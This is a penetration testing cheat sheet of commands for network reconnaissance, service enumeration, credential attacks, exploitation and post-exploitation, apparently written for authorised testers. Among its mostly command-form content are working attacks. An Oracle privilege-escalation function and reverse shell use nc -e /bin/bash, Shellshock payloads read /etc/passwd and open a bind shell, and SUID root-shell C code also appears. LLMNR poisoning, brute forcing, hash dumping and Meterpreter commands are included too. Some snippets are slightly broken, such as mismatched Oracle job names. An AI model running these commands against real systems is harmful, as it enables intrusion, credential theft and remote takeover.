Penetration Testing Tools Cheat Sheet

Penetration testing tools cheat sheet, a quick reference high level overview for typical penetration testing engagements. Designed as a quick reference cheat sheet providing a high level overview of the typical commands you would run when performing a penetration test. For more in depth information I’d recommend the man file for the tool or a more specific pen testing cheat sheet from the menu on the right.

The focus of this cheat sheet is infrastructure / network penetration testing, web application penetration testing is not covered here apart from a few sqlmap commands at the end and some web server enumeration. For Web Application Penetration Testing, check out the Web Application Hackers Hand Book, it is excellent for both learning and reference.

Pre-engagement

Network Configuration

Set IP Address

ifconfig eth0 xxx.xxx.xxx.xxx/24

Subnetting

ipcalc xxx.xxx.xxx.xxx/24

 ipcalc xxx.xxx.xxx.xxx 255.255.255.0 

OSINT

Passive Information Gathering

DNS

WHOIS enumeration
whois domain-name-here.com
Perform DNS IP Lookup
dig a domain-name-here.com @nameserver
Perform MX Record Lookup
dig mx domain-name-here.com @nameserver
Perform Zone Transfer with DIG
dig axfr domain-name-here.com @nameserver

DNS Zone Transfers

 

CommandDescription
nslookup -> set type=any -> ls -d blah.com
Windows DNS zone transfer
dig axfr blah.com @ns1.blah.com
Linux DNS zone transfer

 

Email

Simply Email

Use Simply Email to enumerate all the online places (github, target site etc), it works better if you use proxies or set long throttle times so google doesn’t think you’re a robot and make you fill out a Captcha.

git clone https://github.com/killswitch-GUI/SimplyEmail.git ./SimplyEmail.py -all -e TARGET-DOMAIN

Simply Email can verify the discovered email addresss after gathering.

Semi Active Information Gathering

Basic Finger Printing

Manual finger printing / banner grabbing.

CommandDescription
nc -v 192.168.1.1 25

telnet 192.168.1.1 25

Basic versioning / finger printing via displayed banner
nc TARGET-IP 80 

GET / HTTP/1.1 

Host: TARGET-IP

 User-Agent: Mozilla/5.0 

Referrer: meh-domain

 <enter>

 

Active Information Gathering

DNS Bruteforce

DNSRecon

Port Scanning

Nmap Commands

For more commands, see the Nmap cheat sheet (link in the menu on the right).

Basic Nmap Commands:
ls /usr/share/nmap/scripts/* | grep ftp

Search nmap scripts for keywords

CommandDescription
nmap -v -sS -A -T4 targetNmap verbose scan, runs syn stealth, T4 timing (should be ok on LAN), OS and service version info, traceroute and scripts against services
nmap -v -sS -p--A -T4 targetAs above but scans all TCP ports (takes a lot longer)
nmap -v -sU -sS -p- -A -T4 targetAs above but scans all TCP ports and UDP scan (takes even longer)
nmap -v -p 445 --script=smb-check-vulns
--script-args=unsafe=1 192.168.1.X
Nmap script to scan for vulnerable SMB servers – WARNING: unsafe=1 may cause knockover

Don’t use T4 commands on external pen tests (when using an Internet connection), you’re probably better off using a T2 with a TCP connect scan. A T4 scan would likely be better suited for an internal pen test, over low latency links with plenty of bandwidth. But it all depends on the target devices, embeded devices are going to struggle if you T4 / T5 them and give inconclusive results. As a general rule of thumb, scan as slowly as you can, or do a fast scan for the top 1000 so you can start pen testing then kick off a slower scan.

Nmap UDP Scanning

nmap -sU TARGET

UDP Protocol Scanner

git clone https://github.com/portcullislabs/udp-proto-scanner.git

Scan a file of IP addresses for all services:

./udp-protocol-scanner.pl -f ip.txt

Scan for a specific UDP service:

udp-proto-scanner.pl -p ntp -f ips.txt
Other Host Discovery

Other methods of host discovery, that don’t use nmap

CommandDescription
netdiscover -r 192.168.1.0/24Discovers IP, MAC Address and MAC vendor on the subnet from ARP, helpful for confirming you’re on the right VLAN at $client site

 

Enumeration & Attacking Network Services

Penetration testing tools that spefically identify and / or enumerate network services:

SAMB / SMB / Windows Domain Enumeration

Samba Enumeration

SMB Enumeration Tools
nmblookup -A target
smbclient //MOUNT/share -I target -N
rpcclient -U "" target
enum4linux target

Also see, nbtscan cheat sheet (right hand menu).

CommandDescription
nbtscan 192.168.1.0/24Discover Windows / Samba servers on subnet, finds Windows MAC addresses, netbios name and discover client workgroup / domain
enum4linux -a target-ipDo Everything, runs all options (find windows client domain / workgroup) apart from dictionary based share name guessing

 

Fingerprint SMB Version
smbclient -L //192.168.1.100
Find open SMB Shares
nmap -T4 -v -oA shares --script smb-enum-shares --script-args smbuser=username,smbpass=password -p445 192.168.1.0/24   
Enumerate SMB Users
nmap -sU -sS --script=smb-enum-users -p U:137,T:139 192.168.11.200-254 
python /usr/share/doc/python-impacket-doc/examples
/samrdump.py 192.168.XXX.XXX

RID Cycling:

ridenum.py 192.168.XXX.XXX 500 50000 dict.txt

Metasploit module for RID cycling:

use auxiliary/scanner/smb/smb_lookupsid
Manual Null session testing:

Windows:

net use \TARGET\IPC$ "" /u:""

Linux:

smbclient -L //192.168.99.131
NBTScan unixwiz

Install on Kali rolling:

apt-get install nbtscan-unixwiz 
nbtscan-unixwiz -f 192.168.0.1-254 > nbtscan

LLMNR / NBT-NS Spoofing

Steal credentials off the network.

Metasploit LLMNR / NetBIOS requests

Spoof / poison LLMNR / NetBIOS requests:

auxiliary/spoof/llmnr/llmnr_response
auxiliary/spoof/nbns/nbns_response

Capture the hashes:

auxiliary/server/capture/smb
auxiliary/server/capture/http_ntlm

You’ll end up with NTLMv2 hash, use john or hashcat to crack it.

Responder.py

Alternatively you can use responder.

git clone https://github.com/SpiderLabs/Responder.git
python Responder.py -i local-ip -I eth0

SNMP Enumeration Tools

A number of SNMP enumeration tools.

Fix SNMP output values so they are human readable:

apt-get install snmp-mibs-downloader download-mibs
echo "" > /etc/snmp/snmp.conf

 

CommandDescription
snmpcheck -t 192.168.1.X -c public

snmpwalk -c public -v1 192.168.1.X 1|
grep hrSWRunName|cut -d* * -f

snmpenum -t 192.168.1.X

onesixtyone -c names -i hosts

SNMP enumeration

 

SNMPv3 Enumeration Tools

Idenitfy SNMPv3 servers with nmap:

nmap -sV -p 161 --script=snmp-info TARGET-SUBNET

Rory McCune’s snmpwalk wrapper script helps automate the username enumeration process for SNMPv3:

apt-get install snmp snmp-mibs-downloader
wget https://raw.githubusercontent.com/raesene/TestingScripts/master/snmpv3enum.rb
/usr/share/metasploit-framework/data/wordlists/snmp_default_pass.txt

R Services Enumeration

This is legacy, included for completeness.

nmap -A will perform all the rservices enumeration listed below, this section has been added for completeness or manual confirmation:

RSH Enumeration

RSH Run Commands
rsh <target> <command>
Metasploit RSH Login Scanner
auxiliary/scanner/rservices/rsh_login
rusers Show Logged in Users
rusers -al 192.168.2.1
rusers scan whole Subnet
rlogin -l <user> <target>

e.g rlogin -l root TARGET-SUBNET/24

Finger Enumeration

finger @TARGET-IP

Finger a Specific Username

finger batman@TARGET-IP 

Solaris bug that shows all logged in users:

finger 0@host  

SunOS: RPC services allow user enum:
$ rusers # users logged onto LAN

finger 'a b c d e f g h'@sunhost 

rwho

Use nmap to identify machines running rwhod (513 UDP)

TLS & SSL Testing

testssl.sh

Test all the things on a single host and output to a .html file:

./testssl.sh -e -E -f -p -y -Y -S -P -c -H -U TARGET-HOST | aha > OUTPUT-FILE.html  

Vulnerability Assessment

Install OpenVAS 8 on Kali Rolling:

apt-get update
apt-get dist-upgrade -y
apt-get install openvas
openvas-setup

Verify openvas is running using:

netstat -tulpn

Login at https://127.0.0.1:9392 – credentials are generated during openvas-setup.

Database Penetration Testing

Attacking database servers exposed on the network.

Oracle

Install oscanner:

apt-get install oscanner  

Run oscanner:

oscanner -s 192.168.1.200 -P 1521 

Fingerprint Oracle TNS Version

Install tnscmd10g:

apt-get install tnscmd10g

Fingerprint oracle tns:

tnscmd10g version -h TARGET
nmap --script=oracle-tns-version 

Brute force oracle user accounts

Identify default Oracle accounts:

 nmap --script=oracle-sid-brute 
 nmap --script=oracle-brute 

Run nmap scripts against Oracle TNS:

nmap -p 1521 -A TARGET

Oracle Privilege Escalation

Requirements:

  • Oracle needs to be exposed on the network
  • A default account is in use like scott

Quick overview of how this works:

  1. Create the function
  2. Create an index on table SYS.DUAL
  3. The index we just created executes our function SCOTT.DBA_X
  4. The function will be executed by SYS user (as that’s the user that owns the table).
  5. Create an account with DBA priveleges

In the example below the user SCOTT is used but this should be possible with another default Oracle account.

Identify default accounts within oracle db using NMAP NSE scripts:
nmap --script=oracle-sid-brute 
nmap --script=oracle-brute 

Login using the identified weak account (assuming you find one).

How to identify the current privilege level for an oracle user:
SQL> select * from session_privs; 

SQL> CREATE OR REPLACE FUNCTION GETDBA(FOO varchar) return varchar deterministic authid 
curren_user is 
pragma autonomous_transaction; 
begin 
execute immediate 'grant dba to user1 identified by pass1';
commit;
return 'FOO';
end;
Oracle priv esc and obtain DBA access:

Run netcat: netcat -nvlp 443code>

SQL> create index exploit_1337 on SYS.DUAL(SCOTT.GETDBA('BAR'));
Run the exploit with a select query:
SQL> Select * from session_privs; 

You should have a DBA user with creds user1 and pass1.

Verify you have DBA privileges by re-running the first command again.

Remove the exploit using:
drop index exploit_1337; 
Get Oracle Reverse os-shell:
begin
dbms_scheduler.create_job( job_name    => 'MEH1337',job_type    =>
    'EXECUTABLE',job_action => '/bin/nc',number_of_arguments => 4,start_date =>
    SYSTIMESTAMP,enabled    => FALSE,auto_drop => TRUE); 
dbms_scheduler.set_job_argument_value('rev_shell', 1, 'TARGET-IP');
dbms_scheduler.set_job_argument_value('rev_shell', 2, '443');
dbms_scheduler.set_job_argument_value('rev_shell', 3, '-e');
dbms_scheduler.set_job_argument_value('rev_shell', 4, '/bin/bash');
dbms_scheduler.enable('rev_shell'); 
end; 

MSSQL

Enumeration / Discovery:

Nmap:

nmap -sU --script=ms-sql-info 192.168.1.108 192.168.1.156

Metasploit:

msf > use auxiliary/scanner/mssql/mssql_ping

Bruteforce MSSQL Login

msf > use auxiliary/admin/mssql/mssql_enum

Metasploit MSSQL Shell

msf > use exploit/windows/mssql/mssql_payload
msf exploit(mssql_payload) > set PAYLOAD windows/meterpreter/reverse_tcp

Network

Plink.exe Tunnel

PuTTY Link tunnel

Forward remote port to local address:

plink.exe -P 22 -l root -pw "1337" -R 445:127.0.0.1:445 REMOTE-IP

Pivoting

SSH Pivoting

ssh -D 127.0.0.1:1010 -p 22 user@pivot-target-ip

Add socks4 127.0.0.1 1010 in /etc/proxychains.conf

SSH pivoting from one network to another:

ssh -D 127.0.0.1:1010 -p 22 user1@ip-address-1

Add socks4 127.0.0.1 1010 in /etc/proxychains.conf

proxychains ssh -D 127.0.0.1:1011 -p 22 user1@ip-address-2

Add socks4 127.0.0.1 1011 in /etc/proxychains.conf

Meterpreter Pivoting

TTL Finger Printing

 

Operating SystemTTL Size
Windows128
Linux64
Solaris255
Cisco / Network255

 

IPv4 Cheat Sheets

Classful IP Ranges

E.g Class A,B,C (depreciated)

ClassIP Address Range
Class A IP Address Range0.0.0.0 - 127.255.255.255
Class B IP Address Range128.0.0.0 - 191.255.255.255
Class C IP Address Range192.0.0.0 - 223.255.255.255
Class D IP Address Range224.0.0.0 - 239.255.255.255
Class E IP Address Range240.0.0.0 - 255.255.255.255

IPv4 Private Address Ranges

ClassRange
Class A Private Address Range10.0.0.0 - 10.255.255.255
Class B Private Address Range172.16.0.0 - 172.31.255.255
Class C Private Address Range192.168.0.0 - 192.168.255.255
127.0.0.0 - 127.255.255.255

IPv4 Subnet Cheat Sheet

Subnet cheat sheet, not really realted to pen testing but a useful reference.

 

CIDRDecimal MaskNumber of Hosts
/31255.255.255.2541 Host
/30255.255.255.2522 Hosts
/29255.255.255.2496 Hosts
/28255.255.255.24014 Hosts
/27255.255.255.22430 Hosts
/26255.255.255.19262 Hosts
/25255.255.255.128126 Hosts
/24255.255.255.0254 Hosts
/23255.255.254.0512 Host
/22255.255.252.01022 Hosts
/21255.255.248.02046 Hosts
/20255.255.240.04094 Hosts
/19255.255.224.08190 Hosts
/18255.255.192.016382 Hosts
/17255.255.128.032766 Hosts
/16255.255.0.065534 Hosts
/15255.254.0.0131070 Hosts
/14255.252.0.0262142 Hosts
/13255.248.0.0524286 Hosts
/12255.240.0.01048674 Hosts
/11255.224.0.02097150 Hosts
/10255.192.0.04194302 Hosts
/9255.128.0.08388606 Hosts
/8255.0.0.016777214 Hosts

VLAN Hopping

Using NCCGroups VLAN wrapper script for Yersina simplifies the process.

git clone https://github.com/nccgroup/vlan-hopping.git
chmod 700 frogger.sh
./frogger.sh 

VPN Pentesting Tools

Identify VPN servers:

./udp-protocol-scanner.pl -p ike TARGET(s)

Scan a range for VPN servers:

./udp-protocol-scanner.pl -p ike -f ip.txt

IKEForce

Use IKEForce to enumerate or dictionary attack VPN servers.

Install:

pip install pyip
git clone https://github.com/SpiderLabs/ikeforce.git

Perform IKE VPN enumeration with IKEForce:

./ikeforce.py TARGET-IP –e –w wordlists/groupnames.dic

Bruteforce IKE VPN using IKEForce:

./ikeforce.py TARGET-IP -b -i groupid -u dan -k psk123 -w passwords.txt -s 1
ike-scan
ike-scan TARGET-IP
ike-scan -A TARGET-IP
ike-scan -A TARGET-IP --id=myid -P TARGET-IP-key

IKE Aggressive Mode PSK Cracking

  1. Identify VPN Servers
  2. Enumerate with IKEForce to obtain the group ID
  3. Use ike-scan to capture the PSK hash from the IKE endpoint
  4. Use psk-crack to crack the hash
Step 1: Idenitfy IKE Servers
./udp-protocol-scanner.pl -p ike SUBNET/24
Step 2: Enumerate group name with IKEForce
./ikeforce.py TARGET-IP –e –w wordlists/groupnames.dic
Step 3: Use ike-scan to capture the PSK hash
ike-scan –M –A –n example_group -P hash-file.txt TARGET-IP
Step 4: Use psk-crack to crack the PSK hash
psk-crack hash-file.txt

Some more advanced psk-crack options below:

pskcrack
psk-crack -b 5 TARGET-IPkey
psk-crack -b 5 --charset="01233456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz" 192-168-207-134key
psk-crack -d /path/to/dictionary-file TARGET-IP-key

PPTP Hacking

Identifying PPTP, it listens on TCP: 1723

NMAP PPTP Fingerprint:
nmap –Pn -sV -p 1723 TARGET(S)
PPTP Dictionary Attack
thc-pptp-bruter -u hansolo -W -w /usr/share/wordlists/nmap.lst

DNS Tunneling

Tunneling data over DNS to bypass firewalls.

dnscat2 supports “download” and “upload” commands for getting files (data and programs) to and from the target machine.

Attacking Machine

Installtion:

apt-get update
apt-get -y install ruby-dev git make g++
gem install bundler
git clone https://github.com/iagox86/dnscat2.git
cd dnscat2/server
bundle install

Run dnscat2:

ruby ./dnscat2.rb
dnscat2> New session established: 1422
dnscat2> session -i 1422

Target Machine:

https://downloads.skullsecurity.org/dnscat2/ https://github.com/lukebaggett/dnscat2-powershell/

dnscat --host <dnscat server_ip>

BOF / Exploit

Exploit Research

Find exploits for enumerated hosts / services.

COMMANDDESCRIPTION
searchsploit windows 2003 | grep -i localSearch exploit-db for exploit, in this example windows 2003 + local esc
site:exploit-db.com exploit kernel <= 3Use google to search exploit-db.com for exploits
grep -R "W7" /usr/share/metasploit-framework
/modules/exploit/windows/*
Search metasploit modules using grep – msf search sucks a bit

Searching for Exploits

Install local copy of exploit-db:

 searchsploit –u
 searchsploit apache 2.2
 searchsploit "Linux Kernel"
 searchsploit linux 2.6 | grep -i ubuntu | grep local

Compiling Windows Exploits on Kali

  wget -O mingw-get-setup.exe http://sourceforge.net/projects/mingw/files/Installer/mingw-get-setup.exe/download
  wine mingw-get-setup.exe
  select mingw32-base
  cd /root/.wine/drive_c/windows
  wget http://gojhonny.com/misc/mingw_bin.zip && unzip mingw_bin.zip
  cd /root/.wine/drive_c/MinGW/bin
  wine gcc -o ability.exe /tmp/exploit.c -lwsock32
  wine ability.exe  

Cross Compiling Exploits

gcc -m32 -o output32 hello.c (32 bit)
gcc -m64 -o output hello.c (64 bit)

Exploiting Common Vulnerabilities

Exploiting Shellshock

A tool to find and exploit servers vulnerable to Shellshock:

git clone https://github.com/nccgroup/shocker
./shocker.py -H TARGET  --command "/bin/cat /etc/passwd" -c /cgi-bin/status --verbose
cat file (view file contents)
echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; echo $(</etc/passwd)\r\nHost: vulnerable\r\nConnection: close\r\n\r\n" | nc TARGET 80
Shell Shock run bind shell
echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; /usr/bin/nc -l -p 9999 -e /bin/sh\r\nHost: vulnerable\r\nConnection: close\r\n\r\n" | nc TARGET 80
Shell Shock reverse Shell
nc -l -p 443

Simple Local Web Servers

Python local web server command, handy for serving up shells and exploits on an attacking machine.

CommandDescription
python -m SimpleHTTPServer 80Run a basic http server, great for serving up shells etc
python3 -m http.serverRun a basic Python3 http server, great for serving up shells etc
ruby -rwebrick -e "WEBrick::HTTPServer.new
(:Port => 80, :DocumentRoot => Dir.pwd).start"
Run a ruby webrick basic http server
php -S 0.0.0.0:80Run a basic PHP http server

Mounting File Shares

How to mount NFS / CIFS, Windows and Linux file shares.

CommandDescription
mount 192.168.1.1:/vol/share /mnt/nfsMount NFS share to /mnt/nfs
mount -t cifs -o username=user,password=pass
,domain=blah //192.168.1.X/share-name /mnt/cifs
Mount Windows CIFS / SMB share on Linux at /mnt/cifs if you remove password it will prompt on the CLI (more secure as it wont end up in bash_history)
net use Z: \\win-server\share password
/user:domain\janedoe /savecred /p:no
Mount a Windows share on Windows from the command line
apt-get install smb4k -yInstall smb4k on Kali, useful Linux GUI for browsing SMB shares

HTTP / HTTPS Webserver Enumeration

 

CommandDescription
nikto -h 192.168.1.1Perform a nikto scan against target
dirbusterConfigure via GUI, CLI input doesn’t work most of the time

 

Packet Inspection

 

CommandDescription
tcpdump tcp port 80 -w output.pcap -i eth0tcpdump for port 80 on interface eth0, outputs to output.pcap

Username Enumeration

Some techniques used to remotely enumerate users on a target system.

SMB User Enumeration

 

CommandDescription
python /usr/share/doc/python-impacket-doc/examples
/samrdump.py 192.168.XXX.XXX
Enumerate users from SMB
ridenum.py 192.168.XXX.XXX 500 50000 dict.txtRID cycle SMB / enumerate users from SMB

 

SNMP User Enumeration

 

CommandDescription
snmpwalk public -v1 192.168.X.XXX 1 |grep 77.1.2.25
|cut -d” “ -f4
Enmerate users from SNMP
python /usr/share/doc/python-impacket-doc/examples/
samrdump.py SNMP 192.168.X.XXX
Enmerate users from SNMP
nmap -sT -p 161 192.168.X.XXX/254 -oG snmp_results.txt
(then grep)
Search for SNMP servers with nmap, grepable output

Passwords

Wordlists

 

CommandDescription
/usr/share/wordlistsKali word lists

Brute Forcing Services

Hydra FTP Brute Force

CommandDescription
hydra -l USERNAME -P /usr/share/wordlistsnmap.lst -f
192.168.X.XXX ftp -V
Hydra FTP brute force

Hydra POP3 Brute Force

Hydra SMTP Brute Force

 

CommandDescription
hydra -l USERNAME -P /usr/share/wordlistsnmap.lst -f
192.168.X.XXX pop3 -V
Hydra POP3 brute force

 

Hydra SMTP Brute Force

 

CommandDescription
hydra -P /usr/share/wordlistsnmap.lst 192.168.X.XXX smtp -VHydra SMTP brute force

 

Use -t to limit concurrent connections, example: -t 15

Password Cracking

Password cracking penetration testing tools.

John The Ripper – JTR

 

CommandDescription
john --wordlist=/usr/share/wordlists/rockyou.txt hashesJTR password cracking
john --format=descrypt --wordlist
/usr/share/wordlists/rockyou.txt hash.txt
JTR forced descrypt cracking with wordlist
john --format=descrypt hash --showJTR forced descrypt brute force cracking

Compiling Exploits

Identifying if C code is for Windows or Linux

C #includes will indicate which OS should be used to build the exploit.

 

CommandDescription
process.h, string.h, winbase.h, windows.h, winsock2.hWindows exploit code
arpa/inet.h, fcntl.h, netdb.h, netinet/in.h,
sys/sockt.h, sys/types.h, unistd.h
Linux exploit code

 

Build Exploit GCC

Compile exploit gcc.

 

CommandDescription
gcc -o exploit exploit.cBasic GCC compile

GCC Compile 32Bit Exploit on 64Bit Kali

Handy for cross compiling 32 bit binaries on 64 bit attacking machines.

 

CommandDescription
gcc -m32 exploit.c -o exploitCross compile 32 bit binary on 64 bit Linux

Compile Windows .exe on Linux

Build / compile windows exploits on Linux, resulting in a .exe file.

 

CommandDescription
i586-mingw32msvc-gcc exploit.c -lws2_32 -o exploit.exeCompile windows .exe on Linux

SUID Binary

Often SUID C binary files are required to spawn a shell as a superuser, you can update the UID / GID and shell as required.

below are some quick copy and pate examples for various shells:

SUID C Shell for /bin/bash

int main(void){
       setresuid(0, 0, 0);
       system("/bin/bash");
}       

SUID C Shell for /bin/sh

int main(void){
       setresuid(0, 0, 0);
       system("/bin/sh");
}       

Building the SUID Shell binary

gcc -o suid suid.c  

For 32 bit:

gcc -m32 -o suid suid.c 

TTY Shells

Python TTY Shell Trick

python -c 'import pty;pty.spawn("/bin/bash")'
echo os.system('/bin/bash')

Spawn Interactive sh shell

/bin/sh -i

Spawn Perl TTY Shell

exec "/bin/sh";
perl e 'exec "/bin/sh";'

Spawn Ruby TTY Shell

exec "/bin/sh"

Spawn Lua TTY Shell

os.execute('/bin/sh')

Spawn TTY Shell from Vi

Run shell commands from vi:

:!bash

Spawn TTY Shell NMAP

!sh

Metasploit Cheat Sheet

A basic metasploit cheat sheet that I have found handy for reference.

Basic Metasploit commands, useful for reference, for pivoting see – Meterpreter Pivoting techniques.

Meterpreter Payloads

Windows reverse meterpreter payload

 

CommandDescription
set payload windows/meterpreter/reverse_tcpWindows reverse tcp payload

 

Windows VNC Meterpreter payload

 

CommandDescription
set payload windows/vncinject/reverse_tcp

set ViewOnly false

Meterpreter Windows VNC Payload

Linux Reverse Meterpreter payload

 

CommandDescription
set payload linux/meterpreter/reverse_tcpMeterpreter Linux Reverse Payload

Meterpreter Cheat Sheet

 

CommandDescription
upload file c:\\windowsMeterpreter upload file to Windows target
download c:\\windows\\repair\\sam /tmpMeterpreter download file from Windows target
download c:\\windows\\repair\\sam /tmpMeterpreter download file from Windows target
execute -f c:\\windows\temp\exploit.exeMeterpreter run .exe on target – handy for executing uploaded exploits
execute -f cmd -c Creates new channel with cmd shell
psMeterpreter show processes
shellMeterpreter get shell on the target
getsystemMeterpreter attempts priviledge escalation the target
hashdumpMeterpreter attempts to dump the hashes on the target
portfwd add –l 3389 –p 3389 –r targetMeterpreter create port forward to target machine
portfwd delete –l 3389 –p 3389 –r targetMeterpreter delete port forward

Common Metasploit Modules

Top metasploit modules.

Remote Windows Metasploit Modules (exploits)

 

CommandDescription
use exploit/windows/smb/ms08_067_netapiMS08_067 Windows 2k, XP, 2003 Remote Exploit
use exploit/windows/dcerpc/ms06_040_netapiMS08_040 Windows NT, 2k, XP, 2003 Remote Exploit
use exploit/windows/smb/
ms09_050_smb2_negotiate_func_index
MS09_050 Windows Vista SP1/SP2 and Server 2008 (x86) Remote Exploit

Local Windows Metasploit Modules (exploits)

 

CommandDescription
use exploit/windows/local/bypassuacBypass UAC on Windows 7 + Set target + arch, x86/64

Auxilary Metasploit Modules

 

CommandDescription
use auxiliary/scanner/http/dir_scannerMetasploit HTTP directory scanner
use auxiliary/scanner/http/jboss_vulnscanMetasploit JBOSS vulnerability scanner
use auxiliary/scanner/mssql/mssql_loginMetasploit MSSQL Credential Scanner
use auxiliary/scanner/mysql/mysql_versionMetasploit MSSQL Version Scanner
use auxiliary/scanner/oracle/oracle_loginMetasploit Oracle Login Module

Metasploit Powershell Modules

 

CommandDescription
use exploit/multi/script/web_deliveryMetasploit powershell payload delivery module
post/windows/manage/powershell/exec_powershellMetasploit upload and run powershell script through a session
use exploit/multi/http/jboss_maindeployerMetasploit JBOSS deploy
use exploit/windows/mssql/mssql_payloadMetasploit MSSQL payload

Post Exploit Windows Metasploit Modules

Windows Metasploit Modules for privilege escalation.

 

CommandDescription
run post/windows/gather/win_privsMetasploit show privileges of current user
use post/windows/gather/credentials/gppMetasploit grab GPP saved passwords
load mimikatz -> wdigestMetasplit load Mimikatz
run post/windows/gather/local_admin_search_enumIdenitfy other machines that the supplied domain user has administrative access to
run post/windows/gather/smart_hashdumpAutomated dumping of sam file, tries to esc privileges etc

ASCII Table Cheat Sheet

Useful for Web Application Penetration Testing, or if you get stranded on Mars and need to communicate with NASA.

ASCIICharacter
x00Null Byte
x08BS
x09TAB
x0aLF
x0dCR
x1bESC
x20SPC
x21!
x22
x23#
x24$
x25%
x26&
x27`
x28(
x29)
x2a*
x2b+
x2c,
x2d
x2e.
x2f/
x300
x311
x322
x333
x344
x355
x366
x377
x388
x399
x3a:
x3b;
x3c<
x3d=
x3e>
x3f?
x40@
x41A
x42B
x43C
x44D
x45E
x46F
x47G
x48H
x49I
x4aJ
x4bK
x4cL
x4dM
x4eN
x4fO
x50P
x51Q
x52R
x53S
x54T
x55U
x56V
x57W
x58X
x59Y
x5aZ
x5b[
x5c\
x5d]
x5e^
x5f_
x60`
x61a
x62b
x63c
x64d
x65e
x66f
x67g
x68h
x69i
x6aj
x6bk
x6cl
x6dm
x6en
x6fo
x70p
x71q
x72r
x73s
x74t
x75u
x76v
x77w
x78x
x79y
x7az

CISCO IOS Commands

A collection of useful Cisco IOS commands.

 

 

CommandDescription
enableEnters enable mode
conf tShort for, configure terminal
(config)# interface fa0/0Configure FastEthernet 0/0
(config-if)# ip addr 0.0.0.0 255.255.255.255Add ip to fa0/0
(config-if)# ip addr 0.0.0.0 255.255.255.255Add ip to fa0/0
(config-if)# line vty 0 4Configure vty line
(config-line)# loginCisco set telnet password
(config-line)# password YOUR-PASSWORDSet telnet password
# show running-configShow running config loaded in memory
# show startup-configShow sartup config
# show versionshow cisco IOS version
# show sessiondisplay open sessions
# show ip interfaceShow network interfaces
# show interface e0Show detailed interface info
# show ip routeShow routes
# show access-listsShow access lists
# dir file systemsShow available files
# dir all-filesystemsFile information
# dir /allSHow deleted files
# terminal length 0No limit on terminal output
# copy running-config tftpCopys running config to tftp server
# copy running-config startup-configCopy startup-config to running-config

Cryptography

Hash Lengths

HashSize
MD5 Hash Length16 Bytes
SHA-1 Hash Length20 Bytes
SHA-256 Hash Length32 Bytes
SHA-512 Hash Length64 Bytes

Hash Examples

Likely just use hash-identifier for this but here are some example hashes:

 

HashExample
MD5 Hash Example8743b52063cd84097a65d1633f5c74f5
MD5 $PASS:$SALT Example01dfae6e5d4d90d9892622325959afbe:7050461
MD5 $SALT:$PASSf0fda58630310a6dd91a7d8f0a4ceda2:4225637426
SHA1 Hash Exampleb89eaac7e61417341b710b727768294d0e6a277b
SHA1 $PASS:$SALT2fc5a684737ce1bf7b3b239df432416e0dd07357:2014
SHA1 $SALT:$PASScac35ec206d868b7d7cb0b55f31d9425b075082b:5363620024
SHA-256127e6fbfe24a750e72930c220a8e138275656b
8e5d8f48a98c3c92df2caba935
SHA-256 $PASS:$SALTc73d08de890479518ed60cf670d17faa26a4a7
1f995c1dcc978165399401a6c4
SHA-256 $SALT:$PASSeb368a2dfd38b405f014118c7d9747fcc97f4
f0ee75c05963cd9da6ee65ef498:560407001617
SHA-51282a9dda829eb7f8ffe9fbe49e45d47d2dad9
664fbb7adf72492e3c81ebd3e29134d9bc
12212bf83c6840f10e8246b9db54a4
859b7ccd0123d86e5872c1e5082f
SHA-512 $PASS:$SALTe5c3ede3e49fb86592fb03f471c35ba13e8
d89b8ab65142c9a8fdafb635fa2223c24e5
558fd9313e8995019dcbec1fb58414
6b7bb12685c7765fc8c0d51379fd
SHA-512 $SALT:$PASS976b451818634a1e2acba682da3fd6ef
a72adf8a7a08d7939550c244b237c72c7d4236754
4e826c0c83fe5c02f97c0373b6b1
386cc794bf0d21d2df01bb9c08a
NTLM Hash Exampleb4b9b02e6f09a9bd760f388b67351e2b

SQLMap Examples

A mini SQLMap cheat sheet:

 

CommandDescription
sqlmap -u http://meh.com --forms --batch --crawl=10
--cookie=jsessionid=54321 --level=5 --risk=3
Automated sqlmap scan
sqlmap -u TARGET -p PARAM --data=POSTDATA --cookie=COOKIE
--level=3 --current-user --current-db --passwords
--file-read="/var/www/blah.php"
Targeted sqlmap scan
sqlmap -u "http://meh.com/meh.php?id=1"
--dbms=mysql --tech=U --random-agent --dump
Scan url for union + error based injection with mysql backend
and use a random user agent + database dump
sqlmap -o -u "http://meh.com/form/" --formssqlmap check form for injection
sqlmap -o -u "http://meh/vuln-form" --forms
-D database-name -T users --dump
sqlmap dump and crack hashes for table users on database-name.